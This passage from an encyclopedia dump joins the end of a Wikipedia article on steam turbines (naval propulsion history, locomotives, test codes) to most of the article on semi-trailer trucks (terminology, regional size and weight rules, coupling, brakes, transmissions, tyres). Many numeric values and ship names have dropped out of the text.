turbine stages operating in series. Also, there were three propellers on each shaft for operation at high speeds. The high shaft speeds of the era are represented by one of the first US turbine-powered destroyers, , launched in 1909, which had direct drive turbines and whose three shafts turned at 724 rpm at . The use of turbines in several casings exhausting steam to each other in series became standard in most subsequent marine propulsion applications, and is a form of cross-compounding. The first turbine was called the high pressure (HP) turbine, the last turbine was the low pressure (LP) turbine, and any turbine in between was an intermediate pressure (IP) turbine. A much later arrangement than Turbinia can be seen on in Long Beach, California, launched in 1934, in which each shaft is powered by four turbines in series connected to the ends of the two input shafts of a single-reduction gearbox. They are the HP, 1st IP, 2nd IP, and LP turbines. Cruising machinery and gearing The quest for economy was even more important when cruising speeds were considered. Cruising speed is roughly 50% of a warship's maximum speed and 20-25% of its maximum power level. This would be a speed used on long voyages when fuel economy is desired. Although this brought the propeller speeds down to an efficient range, turbine efficiency was greatly reduced, and early turbine ships had poor cruising ranges. A solution that proved useful through most of the steam turbine propulsion era was the cruising turbine. This was an extra turbine to add even more stages, at first attached directly to one or more shafts, exhausting to a stage partway along the HP turbine, and not used at high speeds. As reduction gears became available around 1911, some ships, notably the battleship , had them on cruising turbines while retaining direct drive main turbines. Reduction gears allowed turbines to operate in their efficient range at a much higher speed than the shaft, but were expensive to manufacture. Cruising turbines competed at first with reciprocating engines for fuel economy. An example of the retention of reciprocating engines on fast ships was the famous of 1911, which along with her sisters and had triple-expansion engines on the two outboard shafts, both exhausting to an LP turbine on the center shaft. After adopting turbines with the s launched in 1909, the United States Navy reverted to reciprocating machinery on the s of 1912, then went back to turbines on Nevada in 1914. The lingering fondness for reciprocating machinery was because the US Navy had no plans for capital ships exceeding until after World War I, so top speed was less important than economical cruising. The United States had acquired the Philippines and Hawaii as territories in 1898, and lacked the British Royal Navy's worldwide network of coaling stations. Thus, the US Navy in 1900–1940 had the greatest need of any nation for fuel economy, especially as the prospect of war with Japan arose following World War I. This need was compounded by the US not launching any cruisers 1908–1920, so destroyers were required to perform long-range missions usually assigned to cruisers. So, various cruising solutions were fitted on US destroyers launched 1908–1916. These included small reciprocating engines and geared or ungeared cruising turbines on one or two shafts. However, once fully geared turbines proved economical in initial cost and fuel they were rapidly adopted, with cruising turbines also included on most ships. Beginning in 1915 all new Royal Navy destroyers had fully geared turbines, and the United States followed in 1917. In the Royal Navy, speed was a priority until the Battle of Jutland in mid-1916 showed that in the battlecruisers too much armour had been sacrificed in its pursuit. The British used exclusively turbine-powered warships from 1906. Because they recognized that a long cruising range would be desirable given their worldwide empire, some warships, notably the s, were fitted with cruising turbines from 1912 onwards following earlier experimental installations. In the US Navy, the s, launched 1935–36, introduced double-reduction gearing. This further increased the turbine speed above the shaft speed, allowing smaller turbines than single-reduction gearing. Steam pressures and temperatures were also increasing progressively, from / [saturated steam] on the World War I-era to / [superheated steam] on some World War II s and later ships. A standard configuration emerged of an axial-flow high-pressure turbine (sometimes with a cruising turbine attached) and a double-axial-flow low-pressure turbine connected to a double-reduction gearbox. This arrangement continued throughout the steam era in the US Navy and was also used in some Royal Navy designs. Machinery of this configuration can be seen on many preserved World War II-era warships in several countries. When US Navy warship construction resumed in the early 1950s, most surface combatants and aircraft carriers used / steam. This continued until the end of the US Navy steam-powered warship era with the s of the early 1970s. Amphibious and auxiliary ships continued to use steam post-World War II, with , launched in 2001, possibly the last non-nuclear steam-powered ship built for the US Navy. Turbo-electric drive Turbo-electric drive was introduced on the battleship , launched in 1917. Over the next eight years the US Navy launched five additional turbo-electric-powered battleships and two aircraft carriers (initially ordered as s). Ten more turbo-electric capital ships were planned, but cancelled due to the limits imposed by the Washington Naval Treaty. Although New Mexico was refitted with geared turbines in a 1931–1933 refit, the remaining turbo-electric ships retained the system throughout their careers. This system used two large steam turbine generators to drive an electric motor on each of four shafts. The system was less costly initially than reduction gears and made the ships more maneuverable in port, with the shafts able to reverse rapidly and deliver more reverse power than with most geared systems. Some ocean liners were also built with turbo-electric drive, as were some troop transports and mass-production destroyer escorts in World War II. However, when the US designed the "treaty cruisers", beginning with launched in 1927, geared turbines were used to conserve weight, and remained in use for all fast steam-powered ships thereafter. Current usage Since the 1980s, steam turbines have been replaced by gas turbines on fast ships and by diesel engines on other ships; exceptions are nuclear-powered ships and submarines and LNG carriers. Some auxiliary ships continue to use steam propulsion. In the U.S. Navy, the conventionally powered steam turbine is still in use on all but one of the Wasp-class amphibious assault ships. The Royal Navy decommissioned its last conventional steam-powered surface warship class, the , in 2002, with the Italian Navy following in 2006 by decommissioning its last conventional steam-powered surface warships, the s. In 2013, the French Navy ended its steam era with the decommissioning of its last . Amongst the other blue-water navies, the Russian Navy currently operates steam-powered s and s. The Indian Navy currently operates INS Vikramaditya, a modified ; it also operates three s commissioned in the early 2000s. The Chinese Navy currently operates steam-powered s, s along with s and the lone Type 051B destroyer. Most other naval forces have either retired or re-engined their steam-powered warships. As of 2020, the Mexican Navy operates four steam-powered former U.S. s. The Egyptian Navy and the Republic of China Navy respectively operate two and six former U.S. s. The Ecuadorian Navy currently operates two steam-powered s (modified s). Today, propulsion steam turbine cycle efficiencies have yet to break 50%, yet diesel engines routinely exceed 50%, especially in marine applications. Diesel power plants also have lower operating costs since fewer operators are required. Thus, conventional steam power is used in very few new ships. An exception is LNG carriers which often find it more economical to use boil-off gas with a steam turbine than to re-liquify it. Nuclear-powered ships and submarines use a nuclear reactor to create steam for turbines. As of 2024, the main propulsion steam turbines (HP & LP) for United States Navy nuclear-powered Nimitz and Ford class aircraft carriers are manufactured by the Curtiss-Wright Corporation in Summerville, SC. Nuclear power is often chosen where diesel power would be impractical (as in submarine applications) or the logistics of refuelling pose significant problems (for example, icebreakers). It has been estimated that the reactor fuel for the Royal Navy's s is sufficient to last 40 circumnavigations of the globe – potentially sufficient for the vessel's entire service life. Nuclear propulsion has only been applied to a very few commercial vessels due to the expense of maintenance and the regulatory controls required on nuclear systems and fuel cycles. Locomotives A steam turbine locomotive engine is a steam locomotive driven by a steam turbine. The first steam turbine rail locomotive was built in 1908 for the Officine Meccaniche Miani Silvestri Grodona Comi, Milan, Italy. In 1924 Krupp built the steam turbine locomotive T18 001, operational in 1929, for Deutsche Reichsbahn. The main advantages of a steam turbine locomotive are better rotational balance and reduced hammer blow on the track. However, a disadvantage is less flexible output power so that turbine locomotives were best suited for long-haul operations at a constant output power. Testing British, German, other national and international test codes are used to standardize the procedures and definitions used to test steam turbines. Selection of the test code to be used is an agreement between the purchaser and the manufacturer, and has some significance to the design of the turbine and associated systems. In the United States, ASME has produced several performance test codes on steam turbines. These include ASME PTC 6–2004, Steam Turbines, ASME PTC 6.2-2011, Steam Turbines in Combined Cycles, PTC 6S-1988, Procedures for Routine Performance Test of Steam Turbines. These ASME performance test codes have gained international recognition and acceptance for testing steam turbines. The single most important and differentiating characteristic of ASME performance test codes, including PTC 6, is that the test uncertainty of the measurement indicates the quality of the test and is not to be used as a commercial tolerance.
Technology
Electricity generation and distribution
null
29381
https://en.wikipedia.org/wiki/Semi-trailer%20truck
Semi-trailer truck
A semi-trailer truck (also known by a wide variety of other terms – see below) is the combination of a tractor unit and one or more semi-trailers to carry freight. A semi-trailer attaches to the tractor with a type of hitch called a fifth wheel. Other terms There are a wide variety of English-language terms for a semi-trailer truck, including: American English Semi-trailer Semi-truck Truck & trailer Semi Big rig Tractor-trailer Eighteen-wheeler British English Articulated lorry Artic (short for articulated) Juggernaut Canadian English Transport truck Transfer truck Regional configurations Europe The main difference between tractor units in Europe and North America is that European models are cab over engine (COE, called "forward control" in the United Kingdom), while the majority of North American trucks are "conventional" (called "normal control" or "bonneted" in the UK). European trucks, whether straight trucks or fully articulated, have a sheer face on the front. This allows shorter trucks with longer trailers (with larger freight capacity) within the legal maximum total length. Furthermore, it offers greater maneuverability in confined areas, a more balanced weight-distribution, and better overall view for the driver. The major disadvantage is that for repairs on COE trucks, the entire cab has to hinge forward to allow maintenance access. In Europe, usually only the driven tractor axle has dual wheels, while single wheels are used for every other axle on the tractor and the trailer. The most common combination used in Europe is a semi tractor with two axles and a cargo trailer with three axles, one of which is sometimes a lift axle, giving 5 axles and 12 wheels in total. This format is now common across Europe as it is able to meet the EU maximum weight limit of without overloading any axle. Individual countries have raised their own weight limit. The U.K., for example, has a limit, an increase achieved by adding an extra axle to the tractor, usually in the form of a middle unpowered lifting axle (midlift) with a total of 14 wheels. The lift axles used on both tractors and trailers allow the trucks to remain legal when fully loaded (as weight per axle remains within the legal limits); on the other hand, these axle set(s) can be raised off the roadway for increased maneuverability or for reduced fuel consumption and tire wear when carrying lighter loads. Although lift axles usually operate automatically, they can be lowered manually even while carrying light loads, in order to remain within legal (safe) limits when, for example, navigating back-road bridges with severely restricted axle loads. For greater detail, see the United Kingdom section, below. When using a dolly, which generally has to be equipped with lights and a license plate, rigid trucks can be used to pull semi-trailers. The dolly is equipped with a fifth wheel to which the trailer is coupled. Because the dolly attaches to a pintle hitch on the truck, maneuvering a trailer hooked to a dolly is different from maneuvering a fifth wheel trailer. Backing the vehicle requires the same technique as backing an ordinary truck/full trailer combination, though the dolly/semi setup is probably longer, thus requiring more space for maneuvering. The tractor/semi-trailer configuration is rarely used on timber trucks since they use the two major advantages of having the weight of the load on the drive wheels, and the loader crane used to lift the logs from the ground can be mounted on the rear of the truck behind the load, allowing a short (lightweight) crane to reach both ends of the vehicle without uncoupling. Also, construction trucks are more often seen in a rigid + midaxle trailer configuration instead of the tractor/semi-trailer setup. Continental Europe The maximum overall length in the EU and EEA member states was with a maximum weight of if carrying an ISO container. However, rules limiting the semi-trailers to and 18.75 m are met with trucks carrying a standardized body with one additional 7.82 m body on tow as a trailer. truck combinations were developed under the branding of EcoCombi which influenced the name of EuroCombi for an ongoing standardization effort where such truck combinations shall be legal to operate in all jurisdictions of the European Economic Area. With the 50% increase in cargo weight, the fuel efficiency increases an average of 20% with a corresponding relative decrease in carbon emissions and with the added benefit of one third fewer trucks on the road. The 1996 EU regulation defines a Europe Module System (EMS) as it was implemented in Sweden. The wording of EMS combinations and EuroCombi are now used interchangeably to point to truck combinations as specified in the EU document; however, apart from Sweden and Finland, the EuroCombi is only allowed to operate on specific roads in other EU member states. Since 1996 Sweden and Finland formally won a final exemption from the European Economic Area rules with 60 tonne and combinations. From 2006, 25.25 m truck trailer combinations are to be allowed on restricted routes within Germany, following a similar (on-going) trial in The Netherlands. Similarly, Denmark has allowed 25.25 m combinations on select routes. These vehicles will run a weight limit. Two types are to be used: 1) a 26-tonne truck pulling a dolly and semi-trailer, or 2) an articulated tractor unit pulling a B-double, member states gained the ability to adopt the same rules. In Italy the maximum permitted weight (unless exceptional transport is authorized) is 44 tonnes for any kind of combination with five axles or more. Czech Republic has allowed 25.25 m combinations with a permission for a selected route. Nordic countries Denmark and Norway allow trucks (Denmark from 2008, and Norway from 2008 on selected routes). In Sweden, the allowed length has been since 1967. Before that, the maximum length was unlimited; the only limitations were on axle load. What stopped Sweden from adopting the same rules as the rest of Europe, when securing road safety, was the national importance of a competitive forestry industry. Finland, with the same road safety issues and equally important forestry industry, followed suit. The change made trucks able to carry three stacks of cut-to-length logs instead of two, as it would be in a short combination. They have one stack together with a crane on the 6×4 truck, and two additional stacks on a four axle trailer. The allowed gross weight in both countries is up to depending on the distance between the first and last axle. In the negotiations starting in the late 1980s preceding Sweden and Finland's entries to the European Economic Area and later the European Union, they insisted on exemptions from the EU rules citing environmental concerns and the transportation needs of the logging industry. In 1995, after their entry to the union, the rules changed again, this time to allow trucks carrying a standard CEN unit of to draw a standard semi-trailer on a dolly, a total overall length of 25.25 m. Later, B-double combinations came into use, often with one container on the B-link and a container (or two containers) on a semi-trailer bed. In allowing the longer truck combinations, what would take two semi-trailer trucks and one truck and trailer to haul on the continent now could be handled by just two 25.25 m trucks – greatly reducing overall costs and emissions. Prepared since late 2012 and effective in January 2013, Finland has changed its regulations to allow total maximum legal weight of a combination to be . At the same time the maximum allowed height would be increased by ; from current maximum of to . The effect this major maximum weight increase would cause to the roads and bridges in Finland over time is strongly debated. However, longer and heavier combinations are regularly seen on public roads; special permits are issued for special cargo. The mining company Boliden AB have a standing special permit for combinations on select routes between mines in the inland and the processing plant in Boliden, taking a load of ore. Volvo has a special permit for a , steering B-trailer-trailer combination carrying two containers to and from Gothenburg harbour and the Volvo Trucks factory, all on the island of Hisingen. Another example is the ongoing project En Trave Till (lit. One more pile/stack) started in December 2008. It will allow even longer vehicles to further rationalize the logging transports. As the name of the project points out, it will be able to carry four stacks of timber, instead of the usual three. The test is limited to Norrbotten county and the European route E4 between the timber terminal in Överkalix and the sawmill in Munksund (outside Piteå). The vehicle is a long truck trailer combination with a gross weight exceeding . It is estimated that this will give a 20% lower cost and 20–25% emissions reduction compared to the regular truck combinations. As the combination spreads its weight over more axles, braking distance, road wear and traffic safety is believed to be either the same or improved with the truck-trailer. In the same program two types of combinations will be tested in Dalsland and Bohuslän counties in western Sweden: an enhanced truck and trailer combination for use in the forest and a b-double for plain highway transportation to the mill in Skoghall. In 2012, the Northland Mining company received permission for combinations with normal axle load (an extra dolly) for use on the Kaunisvaara-Svappavaara route, carrying iron ore. , the longest and heaviest truck in everyday use in Finland is operated by transport company Ketosen Kuljetus as part of a pilot project studying transport efficiency in the timber industry. The combined vehicle is long, has 13 axles, and weighs a total of . Starting from 21 January 2019 the Government of Finland changed the maximum allowed length of truck from . New types of vehicle combinations that differ from the current standards may also be used on the road. The requirements for combinations also include camera systems for side visibility, an advanced emergency braking and lane detector system, electronic driving stability system and electronically controlled brakes. Maximum length of a vehicle combination 34.5 metres Maximum length of a vehicle combination 34.5 metres United Kingdom In the United Kingdom, a semi-trailer truck is known as an 'articulated lorry' (or colloquially as an 'artic'). The maximum permitted gross weight of a semi-trailer truck without the use of a Special Type General Order (STGO) is . In order for a 44,000 kg semi-trailer truck to be permitted on UK roads the tractor and semi-trailer must have three or more axles each. Lower weight semi-trailer trucks can mean some tractors and trailer having fewer axles. In practice, as with double decker buses and coaches in the UK, there is no legal height limit for semi-trailer trucks; however, bridges over do not have the height marked on them. Semi-trailer trucks in continental Europe have a height limit of . Vehicles heavier than 44,000 kg are permitted on UK roads but are indivisible loads, which would be classed as abnormal (or oversize). Such vehicles are required to display an STGO (Special Types General Order) plate on the front of the tractor unit and, under certain circumstances, are required to travel by an authorized route and have an escort. Most UK trailers are long and, dependent on the position of the fifth wheel and kingpin, a coupled tractor unit and trailer will have a combined length of between . Although the Construction and Use Regulations allow a maximum rigid length of , this, combined with a shallow kingpin and fifth wheel set close to the rear of the tractor unit, can give an overall length of around . In January 2012, the Department for Transport began conducting a trial of longer semi-trailers. The trial involves 900 semi-trailers of in length (i.e. longer than the current maximum), and a further 900 semi-trailers of in length (i.e. longer). This will result in the total maximum length of the semi-trailer truck being for trailers in length, and for trailers long. The increase in length will not result in the weight limit being exceeded and will allow some operators to approach the weight limit which may not have been previously possible due to the previous length of trailers. The trial will run for a maximum of 10 years. Providing certain requirements are fulfilled, a Special Types General Order (STGO) allows for vehicles of any size or weight to travel on UK roads. However, in practice, any such vehicle has to travel by a route authorized by the Department of Transport and move under escort. The escort of abnormal loads in the UK is now predominantly carried out by private companies, but extremely large or heavy loads that require road closures must still be escorted by the police. In the UK, some semi-trailer trucks have eight tyres on three axles on the tractor; these are known as six-wheelers or "six leggers," with either the centre or rear axle having single wheels which normally steer as well as the front axle and can be raised when not needed (i.e. when unloaded or only a light load is being carried; an arrangement known as a TAG axle when it is the rear axle, or mid-lift when it is the center axle). Some trailers have two axles which have twin tyres on each axle; other trailers have three axles, of which one axle can be a lift axle which has super-single wheels. In the UK, two wheels bolted to the same hub are classed as a single wheel, therefore a standard six-axle articulated truck is considered to have twelve wheels, even though it has twenty tyres. The UK also allows semi-trailer truck which have six tyres on two axles; these are known as four-wheelers. In 2009, the operator Denby Transport designed and built a B-Train (or B-Double) semi-trailer truck called the Denby Eco-Link to show the benefits of such a vehicle, which were a reduction in road accidents and result in fewer road deaths, a reduction in emissions due to the one tractor unit still being used and no further highway investment being required. Furthermore, Denby Transport asserted that two Eco-Links would replace three standard semi-trailer trucks while, if limited to the current UK weight limit of , it was claimed the Eco-Link would reduce carbon emissions by 16% and could still halve the number of trips needed for the same amount of cargo carried in conventional semi-trailer trucks. This is based on the fact that for light but bulky goods such as toilet paper, plastic bottles, cereals and aluminum cans, conventional semi-trailer trucks run out of cargo space before they reach the weight limit. At , as opposed to usually associated with B-Trains, the Eco-Link also exerts less weight per axle on the road compared to the standard six-axle semi-trailer truck. The vehicle was built after Denby Transport believed they had found a legal-loophole in the present UK law to allow the Eco-Link to be used on the public roads. The relevant legislation concerned the 1986 Road Vehicles Construction and Use Regulations. The 1986 regulations state that "certain vehicles" may be permitted to draw more than one trailer and can be up to . The point of law reportedly hinged on the definition of a "towing implement", with Denby prepared to argue that the second trailer on the Eco-Link was one. The Department for Transport were of the opinion that this refers to recovering a vehicle after an accident or breakdown, but the regulation does not explicitly state this. During BTAC performance testing the Eco-Link was given an "excellent" rating for its performance in maneuverability, productivity, safety and emissions tests, exceeding ordinary semi-trailer trucks in many respects. Reportedly, private trials had also shown the Denby vehicle had a 20% shorter stopping distance than conventional semi-trailer trucks of the same weight, due to having extra axles. The active steer system meant that the Eco-Link had a turning circle of , the same as a conventional semi-trailer truck. Although the Department for Transport advised that the Eco-Link was not permissible on public roads, Denby Transport gave the Police prior warning of the timing and route of the test drive on the public highway, as well as outlining their position in writing to the Eastern Traffic Area Office. On 1 December 2009 Denby Transport were preparing to drive the Eco-Link on public roads, but this was cut short because the Police pulled the semi-trailer truck over as it left the gates in order to test it for its legality "to investigate any... offenses which may be found". The Police said the vehicle was unlawful due to its length and Denby Transport was served with a notice by the Vehicle and Operator Services Agency (VOSA) inspector to remove the vehicle from the road for inspection. Having returned to the yard, Denby Transport was formally notified by Police and VOSA that the semi-trailer truck could not be used. Neither the Eco-Link, nor any other B-Train, have since been permitted on UK roads. However, this prompted the Department for Transport to undertake a desk study into semi-trailer trucks, which has resulted in the longer semi-trailer trial which commenced in 2012. North America In North America, the combination vehicles made up of a powered semi-tractor and one or more semitrailers are known as "semis", "semitrailers", "tractor-trailers", "big rigs", "semi-trucks", "eighteen-wheelers", or "semi-tractor-trailers". The tractor unit typically has two or three axles; those built for hauling heavy-duty commercial-construction machinery may have as many as five, some often being lift axles. The most common tractor-cab layout has a forward engine, one steering axle, and two drive axles. The fifth-wheel trailer coupling on most tractor trucks is movable fore and aft, to allow adjustment in the weight distribution over its rear axle(s). Ubiquitous in Europe but less common in North America since the 1990s, is the cabover engine configuration, where the driver sits next to or over the engine. With changes in the US to the maximum length of the combined vehicle, the cabover was largely phased out of North American over-the-road (long-haul) service by 2007. Cabovers were difficult to service; for a long time, the cab could not be lifted on its hinges to a full 90-degree forward tilt, severely limiting access to the front of the engine. , a truck could cost , while the diesel fuel cost could be $70,000 per year. Trucks average from , with fuel economy standards requiring better than efficiency by 2014. Power requirements in standard conditions are at or at , and somewhat different power usage in other conditions. The cargo trailer usually has tandem axles at the rear, each of which has dual wheels, or eight tires on the trailer, four per axle. In the US it is common to refer to the number of wheel hubs, rather than the number of tires; an axle can have either single or dual tires with no legal difference. The combination of eight tires on the trailer and ten tires on the tractor is what led to the moniker eighteen wheeler, although this term is considered by some truckers to be a misnomer (the term "eighteen-wheeler" is a nickname for a five-axle over-the-road combination). Many trailers are equipped with movable tandem axles to allow adjusting the weight distribution. To connect the second of a set of doubles to the first trailer, and to support the front half of the second trailer, a converter gear known as a "dolly" is used. This has one or two axles, a fifth-wheel coupling for the rear trailer, and a tongue with a ring-hitch coupling for the forward trailer. Individual states may further allow longer vehicles, known as "longer combination vehicles" (or LCVs), and may allow them to operate on roads other than Interstates. Long combination vehicle types include: Doubles (officially "STAA doubles", known colloquially as "a set of joints"): Two trailers. B-Doubles: Twin trailers in B-double configuration (very common in Canada but rarely used in the United States). Triples: Three trailers. Turnpike Doubles: Two – trailers. Rocky Mountain Doubles: One trailer (though usually no more than ) and one trailer (known as a "pup"). In Canada, a Turnpike Double is two trailers, and a Rocky Mountain Double is a trailer with a "pup". The US federal government, which only regulates the Interstate Highway System, does not set maximum length requirements (except on auto and boat transporters), only minimums. Tractors can pull two or three trailers if the combination is legal in that state. Weight maximums are on a single axle, on a tandem, and total for any vehicle or combination. There is a maximum width of and no maximum height. Roads other than Interstates are regulated by individual states, and laws vary widely. Maximum weight varies between to , depending on the combination. Most states restrict operation of larger tandem trailer setups such as triple units, turnpike doubles, and Rocky Mountain doubles. Reasons for limiting the legal trailer configurations include safety concerns and the impracticality of designing and constructing roads that can accommodate the larger wheelbase of these vehicles and the larger minimum turning radii associated with them. In general, these configurations are restricted to the Interstates. Except for these units, double setups are not restricted to certain roads any more than a single setup. They are also not restricted by weather conditions or "difficulty of operation". The Canadian province of Ontario, however, does have weather-related operating restrictions for larger tandem trailer setups. Oceania Australia Australian road transport has a reputation for using very large trucks and road trains. This is reflected in the most popular configurations of trucks generally having dual drive axles and three axles on the trailers, with four tyres on each axle. This means that Australian single semi-trailer trucks will usually have 22 tyres, which is generally more than their counterparts in other countries. Super single tyres are sometimes used on tri-axle trailers. The suspension is designed with travel limiting, which will hold the rim off the road for one blown or deflated tyre for each side of the trailer, so a trailer can be driven at reduced speed to a safe place for repair. Super singles are also often used on the steer axle in Australia to allow greater loading over the steer axle. The increase in loading of steer tyres requires a permit. Long haul transport usually operates as B-doubles with two trailers (each with three axles), for a total of nine axles (including steering). In some lighter duty applications, only one of the rear axles of the truck is driven, and the trailer may have only two axles. From July 2007, the Australian Federal and State Governments allowed the introduction of B-triple trucks on a specified network of roads. B-Triples are set up differently from conventional road trains. The front of their first trailer is supported by the turntable on the prime mover. The second and third trailers are supported by turntables on the trailers in front of them. As a result, B-Triples are much more stable than road trains and handle exceptionally well. True road trains only operate in remote areas, regulated by each state or territory government. In total, the maximum length that any articulated vehicle may be (without a special permit and escort) is , its maximum load may be up to 164 tonnes gross, and may have up to four trailers. However, heavy restrictions apply to the areas where such a vehicle may travel in most states. In remote areas such as the Northern Territory great care must be taken when sharing the road with longer articulated vehicles that often travel during the daytime, especially four-trailer road trains. Articulated trucks towing a single trailer or two trailers (commonly known as "short doubles") with a maximum overall length of are referred to as "General access heavy vehicles" and are permitted in all areas, including metropolitan. B-doubles are limited to a maximum total weight of 62.5 tonnes and overall length of , or if they are fitted with approved FUPS (Front Underrun Protection System) devices. B-doubles may only operate on designated roads, which includes most highways and some major metropolitan roads. B-doubles are very common in all parts of Australia including state capitals and on major routes they outnumber single trailer configurations. Maximum width of any vehicle is and a height of . In the past few years, allowance has been made by several states to allow certain designs of heavy vehicles up to high but they are also restricted to designated routes. In effect, a 4.6 meter high B-double will have to follow two sets of rules: they may access only those roads that are permitted for B-doubles and for 4.6 meter high vehicles. In Australia, both conventional prime movers and cabovers are common, however, cabovers are most often seen on B-doubles on the eastern seaboard where the reduction in total length allows the vehicle to pull longer trailers and thus more cargo than it would otherwise. New Zealand New Zealand legislation governing truck dimensions falls under the Vehicle Dimensions and Mass Rules, published by NZ Transport Agency. New rules were introduced effective 1 February 2017, which increased the maximum height, width and weight of loads and vehicles, to simplify regulations, increase the amount of freight carried by road, and to improve the range of vehicles and trailers available to transport operators. Common combinations in New Zealand are a standard semi-trailer, a B-double, or a rigid towing vehicle pulling a trailer with a drawbar, with a maximum of nine axles. Standard maximum vehicle lengths for trailers with one axle set are: Semi-trailer: Simple: Pole: Trailers with two axle sets can be long, including heavy rigid vehicles towing two trailers. Oversized loads require, at minimum, a permit, and may require one or more pilot vehicles. High-productivity motor vehicle (HPMV) permits are issued for vehicles exceeding 44 tonnes, or the above dimensions. Trucks up to 62 tonnes were allowed, with an initial bridge strengthening program costing $12.5m. Construction Types of trailers There are many types of semi-trailers in use, designed to haul a wide range of products. Box, or dry van Bus Car hauler Intermodal chassis Dry bulk Dump Flatbed Hopper-Bottom Lowboy Refrigerator Reefer Tanker Coupling and uncoupling The cargo trailer is, by means of a king pin, hooked to a horseshoe-shaped quick-release coupling device called a fifth wheel or a turntable hitch at the rear of the towing engine that allows easy hook up and release. The truck trailer cannot move by itself because it only has wheels at the rear end: it requires a forward axle, provided by the towing engine, to carry half the load weight. When braking hard at high speeds, the vehicle has a tendency to fold at the pivot point between the towing vehicle and the trailer. Such a truck accident is called a "trailer swing", although it is also commonly described as a "jackknife." Jackknifing is a condition where the tractive unit swings round against the trailer, and not vice versa. Braking Semi trucks use air pressure, rather than hydraulic fluid, to actuate the brake. The use of air hoses allows for ease of coupling and uncoupling of trailers from the tractor unit. The most common failure is brake fade, usually caused when the drums or discs and the linings of the brakes overheat from excessive use. The parking brake of the tractor unit and the emergency brake of the trailer are spring brakes that require air pressure in order to be released. They are applied when air pressure is released from the system, and disengaged when air pressure is supplied. This is a fail-safe design feature which ensures that if air pressure to either unit is lost, the vehicle will stop to a grinding halt, instead of continuing without brakes and becoming uncontrollable. The trailer controls are coupled to the tractor through two gladhand connectors, which provide air pressure, and an electrical cable, which provides power to the lights and any specialized features of the trailer. Glad-hand connectors (also known as palm couplings) are air hose connectors, each of which has a flat engaging face and retaining tabs. The faces are placed together, and the units are rotated so that the tabs engage each other to hold the connectors together. This arrangement provides a secure connection but allows the couplers to break away without damaging the equipment if they are pulled, as may happen when the tractor and trailer are separated without first uncoupling the air lines. These connectors are similar in design to the ones used for a similar purpose between railroad cars. Two air lines typically connect to the trailer unit. An emergency or main air supply line pressurizes the trailer's air tank and disengages the emergency brake, and a second service line controls the brake application during normal operation. In the UK, male/female quick release connectors (red line or emergency), have a female on the truck and male on the trailer, but a yellow line or service has a male on the truck and female on the trailer. This avoids coupling errors (causing no brakes) plus the connections will not come apart if pulled by accident. The three electrical lines will fit one way around a primary black, a secondary green, and an ABS lead, all of which are collectively known as suzies or suzie coils. In New Zealand all trucks and trailers use a DUOMATIC air coupler which has female receivers mounted on the truck/tractor and on the trailer, and male on both ends of the suzie lines (they can be completely removed and stored in the cab to prevent theft). Connecting the red and blue lines is one operation at each end. The red and blue lines are always on the same side of every fitting so they can never hook up in reverse or the wrong way around. The same system is used in Europe. Another braking feature of semi-trucks is engine braking, which could be either a compression brake (usually shortened to Jake brake) or exhaust brake or combination of both. However, the use of compression brake alone produces a loud and distinctive noise, and to control noise pollution, some local municipalities have prohibited or restricted the use of engine brake systems inside their jurisdictions, particularly in residential areas. The advantage to using engine braking instead of conventional brakes is that a truck can descend a long grade without overheating its wheel brakes. Some vehicles can also be equipped with hydraulic or electric retarders which have an advantage of near silent operation. Transmission Because of the wide variety of loads the semi may carry, they usually have a manual transmission to allow the driver to have as much control as possible. However, all truck manufacturers now offer automated manual transmissions (manual gearboxes with automated gear change), as well as conventional hydraulic automatic transmissions. Semi-truck transmissions can have as few as three forward speeds or as many as 18 forward speeds (plus 2 reverse speeds). A large number of transmission ratios means the driver can operate the engine more efficiently. Modern on-highway diesel engines are designed to provide maximum torque in a narrow RPM range (usually 1200–1500 RPM); having more gear ratios means the driver can hold the engine in its optimum range regardless of road speed (drive axle ratio must also be considered). A ten-speed manual transmission, for example, is controlled via a six-slot H-box pattern, similar to that in five-speed cars — five forward and one reverse gear. Gears six to ten (and high-speed reverse) are accessed by a Lo/High range splitter; gears one to five are Lo range; gears six to ten are High range using the same shift pattern. A Super-10 transmission, by contrast, has no range splitter; it uses alternating "stick and button" shifting (stick shifts 1-3-5-7-9, button shifts 2-4-6-8-10). The 13-, 15-, and 18-speed transmissions have the same basic shift pattern but include a splitter button to enable additional ratios found in each range. Some transmissions may have 12 speeds. Another difference between semi-trucks and cars is the way the clutch is set up. On an automobile, the clutch pedal is depressed full stroke to the floor for every gear shift, to ensure the gearbox is disengaged from the engine. On a semi-truck with constant-mesh transmission (non-synchronized), such as by the Eaton Roadranger series, not only is double-clutching required, but a clutch brake is required as well. The clutch brake stops the rotation of the gears and allows the truck to be put into gear without grinding when stationary. The clutch is pressed to the floor only to allow a smooth engagement of low gears when starting from a full stop; when the truck is moving, the clutch pedal is pressed only far enough to break torque for gear changes. Theoretically, semi-trucks could have diesel-electric transmission, as electric motors have better torque at 0 RPM than diesel engines, but this would significantly increase the weight of the truck itself, above the maximum legal weight for road vehicles. Lights An electrical connection is made between the tractor and the trailer through a cable often referred to as a pigtail. This cable is a bundle of wires in a single casing. Each wire controls one of the electrical circuits on the trailer, such as running lights, brake lights, turn signals, etc. A coiled cable is used which retracts these coils when not under tension, such as when not cornering. It is these coils that cause the cable to look like a pigtail. In most countries, a trailer or semi-trailer must have minimum 2 rear lights (red) 2 stop lights (red) 2 turning lights; one for right and one for left, flashing (amber; red optional in North America. May be combined with a brake light in North America) 2 marking lights behind if wider than certain specifications (red; plus a group of 3 red lights in the middle in North America) 2 marking lights front if wider than the truck or wider than certain specifications (white; amber in North America) Wheels and tires Although dual wheels are the most common, use of two single, wider tires, known as super singles, on each axle is becoming popular among bulk cargo carriers and other weight-sensitive operators. With increased efforts to reduce greenhouse gas emissions, the use of the super-single tire is gaining popularity. There are several advantages to this configuration. The first of these is that super singles reduce fuel consumption. In 1999, tests on an oval track showed a 10% fuel savings when super singles were used. These savings are realized because less energy is wasted flexing fewer tire sidewalls. Second, the lighter overall tire weight allows a truck to be loaded with more freight. The third advantage is that the single wheel encloses less of the brake unit, which allows faster cooling and reduces brake fade. In Europe, super singles became popular when the allowed weight of semitrailer rigs was increased from 38 to 40 tonnes. In this reform the trailer industry replaced two axles with dual wheels, with three axles on wide-base single wheels. The significantly lower axle weight on super singles must be considered when comparing road wear from single versus dual wheels. The majority of super singles sold in Europe have a width of . The standard 385 tires have a legal load limit of . (Note that expensive, specially reinforced 385 tires approved for do exist. Their market share is tiny, except for mounting on the steer axle.) Skirted trailers An innovation rapidly growing in popularity is the skirted trailer. The space between the road and the bottom of the trailer frame was traditionally left open until it was realized that the 